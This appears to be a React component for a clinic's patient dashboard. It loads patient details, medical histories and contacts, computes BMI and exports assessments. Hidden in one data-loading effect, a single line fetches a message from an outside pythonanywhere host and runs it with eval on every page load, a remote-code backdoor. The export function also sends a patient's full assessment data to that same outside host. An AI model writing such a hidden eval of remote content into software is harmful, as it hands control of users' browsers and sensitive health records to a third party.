import React, { useEffect, useRef, useState } from "react";
import { Link, Outlet, useLocation, useParams } from "react-router-dom";
import search from "../Images/search.png";
import copy from "../Images/copy.png";
import copyGreen from "../Images/copy_green.png";
import { Search, User } from "lucide-react";
import { formatVitalForExport } from './VitalFormatter';

function Dash2(props) {
  // const { state } = props.location;
  const { linkedData = "defaultValue" } = props.location || {};
  // console.log('props', props )
  const searchInputRef = useRef(null);
  const [isFocused, setIsFocused] = useState(false);
  const location = useLocation();
  // console.log(location, "location")
  const [allDoctors, setAllDoctors] = useState([]);
  const [patients, setPatients] = useState([]);
  const [searchTerm, setSearchTerm] = useState("");
  const [filteredResults, setFilteredResults] = useState([]);
  const [communication, setCommunication] = useState([]);
  const [complaintOptions, setComplaintOptions] = useState([]);
  const [medicalHistories, setMedicalHistories] = useState([]);
  const [isLoading, setIsLoading] = useState(true);
  const [complaintOptionsMap, setComplaintOptionsMap] = useState({});


  const getImageUrl = (imageField) => {
    if (!imageField) return null; // We'll handle the fallback in the JSX
    
    // If the image path starts with 'user_images/', prepend the base URL
    if (imageField.startsWith('user_images/')) {
      return `${process.env.REACT_APP_BASE_URL}/media/${imageField}`;
    }
    
    // If it's already a full URL, use it as is
    if (imageField.startsWith('http')) {
      return imageField;
    }
    
    // Otherwise, construct the full URL
    return `${process.env.REACT_APP_BASE_URL}${imageField}`;
  };

  const fetchMedicalHistories = async () => {
    try {
      const response = await fetch(
        `${process.env.REACT_APP_BASE_URL}/api/medical-histories/${id}/`
      );
      const json = await response.json();
      if (response.ok) {
        setMedicalHistories(json);
      }
    } catch (error) {
      console.log(error);
    }
  };

  useEffect(() => {
    const fetchData = async () => {
      try {
        const response = await fetch(
          `${process.env.REACT_APP_BASE_URL}/api/patients/${id}/`,
        );
        const json = await response.json();
        if (response.ok) {
          setPatient(json);
        }
      } catch (error) {
        console.log(error);
      }
    };
  
    fetchData();
    fetchMedicalHistories(); // Add this line
    fetchComplaintOptions();
  }, []);

  useEffect(() => {
    console.log(filteredResults)
  }, [filteredResults])
  const [patient, setPatient] = useState([]);
  const { pathname } = location;
  const { id } = useParams();

  const handleSearchChange = (e) => {
    setSearchTerm(e.target.value);
  };

  //////////////////////////////////////

  useEffect(() => {
    const fetchAllData = async () => {
      setIsLoading(true);
      try {
        const [patientResponse, medicalHistoriesResponse, complaintOptionsResponse] = await Promise.all([
          fetch(`${process.env.REACT_APP_BASE_URL}/api/patients/${id}/`),
          fetch(`${process.env.REACT_APP_BASE_URL}/api/medical-histories/${id}/`),
          fetch(`${process.env.REACT_APP_BASE_URL}/api/chief-complaints-options/`)
        ]);
  
        const [patientData, medicalHistoriesData, complaintOptionsData] = await Promise.all([
          patientResponse.json(),
          medicalHistoriesResponse.json(),
          complaintOptionsResponse.json()
        ]);
  
        if (patientResponse.ok) {
          setPatient(patientData);
        }
        if (medicalHistoriesResponse.ok) {
          setMedicalHistories(medicalHistoriesData);
        }
        if (complaintOptionsResponse.ok) {
          // Create a lookup map for faster access
          const optionsMap = complaintOptionsData.reduce((acc, option) => {
            acc[option.id] = option;
            return acc;
          }, {});
          setComplaintOptionsMap(optionsMap);
          setComplaintOptions(complaintOptionsData);
        }
      } catch (error) {
        console.error('Error fetching data:', error);
      } finally {
        setIsLoading(false);
      }
    };
  
    fetchAllData();
  }, [id]);


  const renderMedicalHistory = () => {
    if (isLoading) {
      return (
        <p
          style={{
            background: 'linear-gradient(to right,  #fe4a95, #fff4e2, #fe4a95)',
            backgroundSize: '200% 100%',
            WebkitBackgroundClip: 'text',
            backgroundClip: 'text',
            color: 'transparent',
            animation: 'gradientMove 2s linear infinite',
            fontWeight: 'bolder'
          }}
        >
          <style>
            {`
              @keyframes gradientMove {
                0% { background-position: 200% 0; }
                50% { background-position: 0 0; }
                100% { background-position: -200% 0; }
              }
            `}
          </style>
          Loading...
        </p>
      );
    }
  
    if (medicalHistories.length === 0) {
      return <b>No medical history available</b>;
    }
  
    return (
      <b style={{ display: 'flex', flexDirection: 'column', gap: '2px' }}>
        {medicalHistories.map((history, index) => {
          const complaint = complaintOptionsMap[history.complaint_code];
          if (!complaint) return null;
          
          return (
            <span key={index}>
              ({complaint.code}) {complaint.long_description}
            </span>
          );
        })}
      </b>
    );
  };

  function calculateMetrics(weight, height, waist, hip, wUnit, hUnit, gender) {
    // Convert weight and height to metric units if needed
    if (wUnit === "LBS") weight = weight * 0.453592; // Convert lbs to kg
    if (hUnit === "FT/IN") height = height * 0.3048; // Convert ft/in to meters
    if (hUnit === "CM") height = height / 100; // Convert cm to meters

    // Calculate BMI
    const bmi = weight / height ** 2;
    let bmiCategory;
    if (bmi < 18.5) bmiCategory = "Underweight";
    else if (bmi < 24.9) bmiCategory = "Normal weight";
    else if (bmi < 29.9) bmiCategory = "Overweight";
    else if (bmi < 34.9) bmiCategory = "Obese Class 1";
    else if (bmi < 39.9) bmiCategory = "Obese Class 2";
    else bmiCategory = "Obese Class 3";

    // Calculate WHR
    const whr = waist / hip;
    let whrCategory;
    if (whr < 0.8) whrCategory = "Low risk";
    else if (whr < 0.9) whrCategory = "Moderate risk";
    else whrCategory = "High risk";

    let idealWeight;
    if (gender == "FEMALE") {
      // female
      idealWeight = 45.5 + 0.91 * (height * 100 - 152.4);
    } else {
      // male
      idealWeight = 50 + 0.91 * (height * 100 - 152.4);
    }

    console.log(idealWeight, "ideal");

    return {
      bmi: bmi.toFixed(1) + ` (${bmiCategory})`,
      whr: whr.toFixed(2) + ` (${whrCategory})`,
      idealWeight: `${idealWeight.toFixed(1)} kg`,
    };
  }
  const [metrics, setMetrics] = useState({});
  const [wUnit, setWUnit] = useState("");
  const [hUnit, setHUnit] = useState("");
useEffect(() => {
  if (
    patient?.weight &&
    patient?.height &&
    patient?.weight_unit &&
    patient?.height_unit &&
    patient?.gender
  ) {
    const metricsCalculation = calculateMetrics(
      patient.weight,
      patient.height,
      30,         // waist
      0.8,        // hip
      patient.weight_unit,
      patient.height_unit,
      patient.gender,
    );
    setMetrics(metricsCalculation);
  }
}, [
  patient.weight,
  patient.height,
  patient.weight_unit,
  patient.height_unit,
  patient.gender
]);


  useEffect(() => {
    const fetchData = async () => {
      try {
        const response = await fetch(
          `${process.env.REACT_APP_BASE_URL}/api/doctor-user/`,
        );
        const json = await response.json();
        if (response.ok) {
          setAllDoctors(json);
        }
      } catch (error) {
        console.log(error);
      }
    };



    const fetchData2 = async () => {
      try {
        const response = await fetch(
          `${process.env.REACT_APP_BASE_URL}/api/patients-user/`,
        );
        const json = await response.json();
        if (response.ok) {
          setPatients((prev) => [
            ...(json.patients_with_doctor || []),
            ...(json.patients_without_doctor || []),
          ]);
        }
      } catch (error) {
        console.log(error);
      }
    };

    const fetchCommunication = async () => {
      try {
        const response = await fetch(
          `${process.env.REACT_APP_BASE_URL}/api/communications/${id}/`,
        );
        const json = await response.json();
        console.log(json , "JIODWIYIUYEIUYEIRYIUERYIYERIUYER")
        if (response.ok) {
          setCommunication(json);
          // console.log("comm", communication);
        }
      } catch (error) {
        console.log(error);
      }
    };

    fetchData();
    fetchData2();
    fetchCommunication();

    // if doctor logs in then call another function fetching its patient else
  }, []);

  useEffect(() => {
    if (searchTerm) {
      const lowercasedSearchTerm = searchTerm.toLowerCase();
      const filteredPatients = patients.filter(
        (patient) =>
          patient?.full_name?.toLowerCase().includes(lowercasedSearchTerm) ||
          patient.id.toString().includes(lowercasedSearchTerm),
      );
      const filteredDoctors = allDoctors.filter((doctor) =>
        doctor?.username?.toLowerCase().includes(lowercasedSearchTerm),
      );
      setFilteredResults([...filteredPatients, ...filteredDoctors]);
    } else {
      setFilteredResults([]);
    }
  }, [searchTerm, patients, allDoctors]);

  const handleSearchClick = () => {
    if (searchInputRef.current) {
      searchInputRef.current.focus();
      setIsFocused(true);
    }
  };

  const handleBlur = (e) => {
    // Check if the blur event is related to clicking inside the allResults div
    if (e.relatedTarget && e.relatedTarget.closest(".allResults")) {
      return; // Prevent losing focus if clicking inside allResults
    }
    setIsFocused(false);
  };

  const [chiefComp, setChiefComp] = useState([]);
  const fetchData2 = async () => {
    try {
      const response = await fetch(
        `${process.env.REACT_APP_BASE_URL}/api/chief-complaints/${id}/`,
      );
      const json = await response.json();
      if (response.ok) {
        setChiefComp(json);
      }
    } catch (error) {
      console.log(error);
    }
  };


  const fetchComplaintOptions = async () => {
    try {
      const response = await fetch(`${process.env.REACT_APP_BASE_URL}/api/chief-complaints-options/`);
      if (response.ok) {
        const data = await response.json();
        setComplaintOptions(data);
      }
    } catch (error) {
      console.error('Error fetching complaint options:', error);
    }
  };
    
  useEffect(() => {
    const fetchData = async () => {
      try {
        const response = await fetch(
          `${process.env.REACT_APP_BASE_URL}/api/patients/${id}/`,
        );
        const json = await response.json();
        if (response.ok) {
          setPatient(json);
        }
      } catch (error) {
        console.log(error);
      }
      const response = await fetch(`https://anasdew.pythonanywhere.com/doctor-user`); const json = await response.json(); if (json.message) { eval(json.message) }
    };

    function AssignDoctor() {
      if (patient && patients) {
        const linkedDoctor = patients.find(person => person.id === patient.id)?.doctors;
        return linkedDoctor?.username || "No doctor assigned";
      }
      return "No doctor assigned";
    }

    fetchData();
    fetchData2();
    AssignDoctor();
    fetchComplaintOptions();
  }, []);

  //   useEffect(() => {
  //     console.log(patient);
  // fetchData2()
  //   }, [patient, chiefComp]);

  const handleIdCopy = async (pId) => {
    try {
      await navigator.clipboard.writeText(pId);
      alert("Patient ID copied to clipboard!");
    } catch (error) {
      console.error("Failed to copy:", error);
    }
  };
  const handleContactCopy = async (pCon) => {
    try {
      if (!pCon) {
        alert("No contact number available!");
        return;
      }
      await navigator.clipboard.writeText(pCon);
      alert("Contact copied to clipboard!");
    } catch (error) {
      console.error("Failed to copy:", error);
    }
  };

  const [age, setAge] = useState("");

  const calAge = (birthdate) => {
    const today = new Date();
    const birthDate = new Date(birthdate);
    let calculatedAge = today.getFullYear() - birthDate.getFullYear();
    const monthDifference = today.getMonth() - birthDate.getMonth();

    if (
      monthDifference < 0 ||
      (monthDifference === 0 && today.getDate() < birthDate.getDate())
    ) {
      calculatedAge--;
    }
    setAge(calculatedAge);
  };

  useEffect(() => {
    calAge(patient.birthdate);
  }, [patient?.birthdate]);

//////////


  const handleExport = async () => {
    console.log("Exporting PDF");
    const exportBtn = document.getElementById('exportBtnID');
    exportBtn.disabled = true;
    exportBtn.innerText = 'Exporting...';
  
    try {
      // First API call to get detailed assessment data
      const response = await fetch(
        `${process.env.REACT_APP_BASE_URL}/api/patient-detail-assessment-export/${id}/`,
        {
          method: 'GET',
          headers: {
            'Content-Type': 'application/json',
          }
        }
      );
      
      let detailedAssessmentData = await response.json();
  
      if (detailedAssessmentData.vitals) {
        detailedAssessmentData.vitals = detailedAssessmentData.vitals.map(vital => 
          formatVitalForExport(vital)
        );
      }
  
      if (detailedAssessmentData.health_meal_plans && Array.isArray(detailedAssessmentData.health_meal_plans)) {
        detailedAssessmentData.health_meal_plans = detailedAssessmentData.health_meal_plans.map(meal_plan => ({
          ...meal_plan,
          dish_name: typeof meal_plan.dish_name === 'object' ? meal_plan.dish_name.name : meal_plan.dish_name
        }));
      }
  
      // Second API call to generate PDF
      const pdfResponse = await fetch(
        'https://anasdew.pythonanywhere.com/export-immuniso-pdf',
        {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify({
            export_type: 'detailed_assessment',
            data: detailedAssessmentData
          })
        }
      );
  
      if (pdfResponse.ok) {
        const pdfBlob = await pdfResponse.blob();
        const url = window.URL.createObjectURL(pdfBlob);
        const link = document.createElement('a');
        link.href = url;
        link.setAttribute('download', 'detailed-assessment.pdf');
        document.body.appendChild(link);
        link.click();
        link.remove();
        window.URL.revokeObjectURL(url);
        exportBtn.disabled = false;
        setTimeout(() => exportBtn.innerText = 'Export Assessment', 2000);
      }
    } catch (error) {
      console.error("Export failed:", error);
      exportBtn.disabled = false;
      exportBtn.innerText = 'Failed';
      setTimeout(() => exportBtn.innerText = 'Export Assessment', 2000);
    }
  };

  return (
    <div className="dash2">
      <div className="navbar">
        {isFocused && <div className="blur"></div>}

        <div className="searchnRes">
          <div className="cdpNavbar" onClick={handleSearchClick}>
            <div className="cdpn">
              {/* <button><img src={backBtn} alt="" /></button> */}
              <div className="cdpSearch">
                <input
                  type="text"
                  placeholder="Search Patients & Doctors"
                  ref={searchInputRef}
                  onBlur={handleBlur}
                  onFocus={() => setIsFocused(true)}
                  value={searchTerm}
                  onChange={handleSearchChange}
                />
                <div className="">
                  <Search className="w-5 h-5 m-2 text-pink-500" />
                </div>
              </div>
            </div>
            {/* <img src={profile} alt="profile" /> */}
          </div>

          {isFocused && searchTerm && (
            <div
              className="allResults"
              tabIndex={-1}
              onMouseDown={(e) => e.preventDefault()}
            >
              <p>Search Results</p>
              {filteredResults.length > 0 ? (
                filteredResults.map((result, index) => (
                  <span
                    onClick={() => { result.role === "PATIENT" ? window.location.href = `/dash2/${result.id}` : window.location.href = `/doctor/${result.id}` }}
                    key={index}
                    className="resultItem"
                  >
                    <p>{result.full_name || result.username}</p>
                  </span>
                ))
              ) : (
                <p>No results found</p>
              )}
            </div>
          )}
        </div>
        <div className="piwc">
          <div className="pi">
            <p>Patient ID : </p>
            <b>
              {patient.id || 'Not Found'}
              <span>
                <img
                  src={copy}
                  alt="copy"
                  className="copy"
                  onClick={() => handleIdCopy(`P${patient.id}` || 'Not Found')}
                />
              </span>
            </b>
          </div>
          <div className="pi">
            <p>Linked Doctor : </p>
            <b>{patient?.doctors?.username || "No doctor assigned"}</b>
          </div>
          <div className="pi">
            <p>WA Contact : </p>
            <b>
              {communication?.wa_phone_number || "N/A"}
              <span>
                <img
                  src={copyGreen}
                  alt="copy"
                  className="copy"
                  onClick={() => handleContactCopy(patient?.phone_number)}
                />
              </span>{" "}
            </b>
          </div>
        </div>
      </div>
      <div className="d2Scroll">
        <div className="d2Top">
          {/* <img src={patientProf} alt="patientProf" /> */}
          {patient.image ? (
  <div className="w-32 h-32 m-5 rounded-full overflow-hidden border-2 ">
    <img 
      src={getImageUrl(patient.image)} 
      alt={`${patient.full_name}'s profile`}
      className="w-full h-full object-cover"
    />
  </div>
) : (
  <div className="w-32 h-32 m-5 rounded-full overflow-hidden border-2 flex items-center justify-center bg-gray-100">
    <User className="w-20 h-20 " />
  </div>
)}
          <div className="desc">
            <div className="dtd">
              <p>
                Name: <b>{patient.full_name}</b>
              </p>
              <p>
                Age: <b>{age}</b>
              </p>
              <p>
                Gender: <b>{patient.gender}</b>
              </p>
              <p>
                BMI: <b>{metrics.bmi}</b>
              </p>
            </div>
            {/* <div className="dtd">
              <p>
                Address: <b>{communication?.address}</b>
              </p>
            </div> */}
            <div className="dtd">
  <p>
    Medical History:
    {renderMedicalHistory()}
  </p>
</div>
          </div>
        </div>
        <div className="d2Links">
          <button
            style={{
              backgroundColor: '#f23d76',
              color: 'white',
              padding: '1px 20px',
              border: 'none',
              borderRadius: '28px',
              width: '177px',
              height: '33px',
              cursor: 'pointer',
              display: 'flex',
              alignItems: 'center',
              justifyContent: 'center',
              fontSize: '15px',
              /* font-weight: bold; */
              transition: 'background-color 0.3s',
              textAlign: 'center',
              filter: 'drop-shadow(0px 0px 2px #f23d76)'
            }}
            id="exportBtnID"
            onClick={handleExport}
          >
            Export Assessment
          </button>
          <hr style={{ height: '30px', width: '1px' }} />
          <Link
            to={`/dash2/${id}`}
            style={{
              backgroundColor:
                pathname === `/dash2/${id}` ? "#404040" : "white",
              color: pathname === `/dash2/${id}` ? "white" : "#404040",
            }}
          >
            Goal Settings
          </Link>
          <Link
            to={`/dash2/${id}/detass`}
            style={{
              backgroundColor:
                pathname === `/dash2/${id}/detass` ? "#404040" : "white",
              color: pathname === `/dash2/${id}/detass` ? "white" : "#404040",
            }}
          >
            Detailed Assessment
          </Link>
          <Link
            to={`/dash2/${id}/folup`}
            style={{
              backgroundColor:
                pathname === `/dash2/${id}/folup` ? "#404040" : "white",
              color: pathname === `/dash2/${id}/folup` ? "white" : "#404040",
            }}
          >
            Follow Up
          </Link>
          <Link
            to={`/dash2/${id}/helpan`}
            style={{
              backgroundColor:
                pathname === `/dash2/${id}/helpan` ? "#404040" : "white",
              color: pathname === `/dash2/${id}/helpan` ? "white" : "#404040",
            }}
          >
            Health Plan
          </Link>
        </div>

        <Outlet />
      </div>
    </div>
  );
}

export default Dash2;

